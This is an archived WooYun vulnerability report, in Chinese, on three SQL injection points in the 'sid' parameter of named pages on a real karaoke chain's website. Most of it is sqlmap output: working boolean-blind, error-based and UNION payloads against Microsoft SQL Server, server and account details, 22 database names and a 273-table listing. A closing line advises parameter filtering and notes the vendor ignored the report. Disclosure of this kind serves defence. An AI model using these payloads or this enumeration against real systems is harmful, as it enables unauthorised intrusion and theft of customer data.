乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-26: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-08-10: 厂商已经主动忽略漏洞,细节向公众公开
RT,三处sql注入
第一处:
http://www.cashboxparty.com/star/star_basicdata.asp?sid=22sid参数
第二处:
http://www.cashboxparty.com/star/star_excl.asp?sid=22sid参数
第三处
http://www.cashboxparty.com/star/star_newdisk.asp?sid=22sid参数
其中包含多个数据库
sqlmap identified the following injection points with a total of 47 HTTP(s) requests:---Parameter: sid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sid=22' AND 2660=2660 AND 'oGdD'='oGdD Vector: AND [INFERENCE] Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: sid=22' AND 8270=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8270=8270) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'rABW'='rABW Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) Type: UNION query Title: Generic UNION query (NULL) - 19 columns Payload: sid=22' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(117)+CHAR(85)+CHAR(111)+CHAR(83)+CHAR(108)+CHAR(81)+CHAR(77)+CHAR(86)+CHAR(112)+CHAR(119)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Vector: UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2008current user: 'cbwebuser'current database: 'chian'current user is DBA: Falseavailable databases [22]:[*] BookingCRM[*] CallCenter[*] Cashbox[*] CashBoxParty[*] CBMember[*] chian[*] dblog[*] diamond[*] EDM[*] EipCB[*] FaceBook[*] InvestorInfo[*] KTVEmp[*] master[*] model[*] msdb[*] official[*] Platinum[*] SMS[*] StoreSMS[*] tempdb[*] TESTSMSDBsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: sid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sid=22' AND 2660=2660 AND 'oGdD'='oGdD Vector: AND [INFERENCE] Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: sid=22' AND 8270=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8270=8270) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'rABW'='rABW Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) Type: UNION query Title: Generic UNION query (NULL) - 19 columns Payload: sid=22' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(117)+CHAR(85)+CHAR(111)+CHAR(83)+CHAR(108)+CHAR(81)+CHAR(77)+CHAR(86)+CHAR(112)+CHAR(119)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Vector: UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2008Database: chian[273 tables]+-------------------------------+| adboard || Act_100M || Act_96122_Ans || Act_96122_Coupon || Act_96122_Item || Act_96122_Q || Act_97014_Draw || Act_Coupon_1Hr || Act_Lottery || Act_Lyrics_Del || Act_Lyrics_Del || Act_Meal_Item || Act_Meal_Vote || CTVSuperStarList || China_Act_Elva_Member_Del || China_Act_Elva_Member_Del || China_Act_Elva_Vote || D99_CMD || D99_REG || D99_Tmp || DiamondGF || DiamondPoint || Diff_Member || Event_survey || ForiegnBillboard1_1109 || ForiegnBillboard1_1109 || ForiegnBillboard1bak || ForiegnBillboard2_1109 || ForiegnBillboard2_1109 || ForiegnBillboard2bak2 || ForiegnBillboard2bak2 || Forum || GF_Info1_Business || GF_Info1_Business || GameAnswer || GameCoverPrize || GameCoverPrize || GameCoverVote || GameGate || GameInfo || GameJoin || GamePicMem || GamePicPath || GamePicPrize || GamePicVote || Game_Draw || Game_Name || Game_Prize_Name || Game_Prize_Store || GenericErrorLog || HR_ZIPCODEDETAIL || HR_ZIPCODEDETAIL || HR_ZIPCODEMASTER || HR_ZIPCODE_V || HackLog || IndexPic || IndexSong || IndexTitle || Job_Admin || Job_Education || Job_Family || Job_Licence || Job_Login_Log || Job_Mail_Sample || Job_Parameter || Job_Recruit || Job_Resume || Job_Title || Job_Vacancy || Job_Work || Job_ZipCodeDetail || Job_ZipCodeDetail || Job_ZipCodeMaster || Job_ZipCode_v || KNowBySongerSearchCount || Ktv_Act_Block || Ktv_Act_Dept || Ktv_Act_Setup_Dept || Ktv_Act_Setup_Dept || Ktv_Act_Title || LNetIn_Join || LNetIn_Join || LoginKeysLog || LoginKeysLog || MSNSongDataBySmartPhone || MSN_SongData1 || MSN_SongData1 || MemberInfoUpdateLogByWebSite || MobileWebOperator || MyFriends_MMS || MyFriends_MMS || MyPartyMessageLog || MyPartyMessageLog || My_DiningCar_Old || My_DiningCar_Old || My_PartyMessage || NetInBase || NetInDetail || NetInSubmission || NetinDrawResult || NewStar2005_Main || NewStar2005_SecID || NewStar2005_SecSong || NewStar2005_Sort || NewStar2005_Vote_Deceive_Stop || NewStar2005_Vote_Deceive_Stop || NewStar2005_Vote_NameList || OrderSongsLog || OrderSongsLog || ProcessFiles || Rose_Card || Rose_Dept || SearchSongDataExecuteLog || Sel_Member || SellToolsAgressByMember || SellToolsInfo || SongKinds || SongerNameByWiki || Songs_3456 || SpecialRoom_Service_EMail || SysAuditResult || SysExecType || SysExecuteID || SysVideoType || TempSongerInfo || Tmp_Web_Menu || TransformChinaChar || VideoInfoByTypeID || VideoInfoByTypeID || VideoJobExecuteStatus || WebCouponDownLoadGather || WebDiningCarMenu_old || WebDiningCarMenu_old || WebDiningCar_Detail || WebDiningCar_Head || WebDiningCar_SubDetail || WebMemberSMSValidate || WebSecurityDetail || WebSecurityHead || Women_Order || Women_Song || X_2627 || X_3547 || X_3898 || X_4010 || X_5298 || X_5730 || X_6993 || X_7337 || X_7743 || X_7999 || X_8562 || e-coupon || aaa012701 || aaa021201 || act_2006party_card || act_2006party_card || act_2006party_starid || act_cd200 || act_coupon_printlog || act_ecoupon_ipview || act_ecoupon_pageview || act_jaycoupon || act_kao_draw || act_kao_open_prize || act_kao_prize || act_ksong_apply || act_ksong_game || act_ksong_vote || act_moodstory_end || act_moodstory_end || act_rdate_report || ad_news_onclick || ad_onclick || cb_newsongday || cbweb_counter || coupon060426_record || coupon060426_record || coupon060701a_record || coupon060701a_record || diamond_store || discussion_post || discussion_topics || dog_photo || dog_puzzle || dog_vote_deceive_stop || dog_vote_deceive_stop || dog_vote_item || dtproperties || event_Chang || event_Guess || event_PAPA_VoteIP || event_PAPA_VoteIP || event_PAPA_VoteIP || event_PAPA_backup || event_PAPAid || event_SendCard || foofoofoo || friend_save || goolitxt_superuser || goolitxt_superuser || goolitxt_vote || homepage || hr_zipcode_t || hr_zipcodedetail_t || hr_zipcodemaster_t || imode_song_history || imode_song_history || itv_box || itv_box || itv_kanban || ktv_hotnews || ktv_room || love99 || magazine || mem_addr || mem_area_old || mem_area_old || mem_career || mem_cash || mem_rdate_mms || mem_rdate_mms || mem_zipcode || member_booking || member_booking || member_web || mg_Topic || mgpic || music_media_cd || music_media_song || mv_home || new_ma_users || news || newstar2006_batch || newstar2006_group || newstar2006_namelist || newstar2006_random || page_record || recomAlbum || service_email || songs1123 || songs1123 || songsDelete || songsNew0619 || songsNew0619 || songsNewbak || songs_MyRoomSong_Old || songs_MyRoomSong_Old || songs_SongType || songs_billboard_rock_log || songs_billboard_rockxml || songs_jp || songs_lang2 || songs_lang2 || songs_mv || songs_mysong || songs_rock || songs_temp || songsbillboard1019 || songsbillboard1019 || songsbillboardbak || songsnew0831 || star_basicdata || star_disk_photo || star_disk_photo || star_excl || star_photo || star_rock || star_route || subhome_diamond || subtitles_subtype || subtitles_subtype || sysdiagrams |+-------------------------------+
参数过滤,尽快修复吧
未能联系到厂商或者厂商积极拒绝
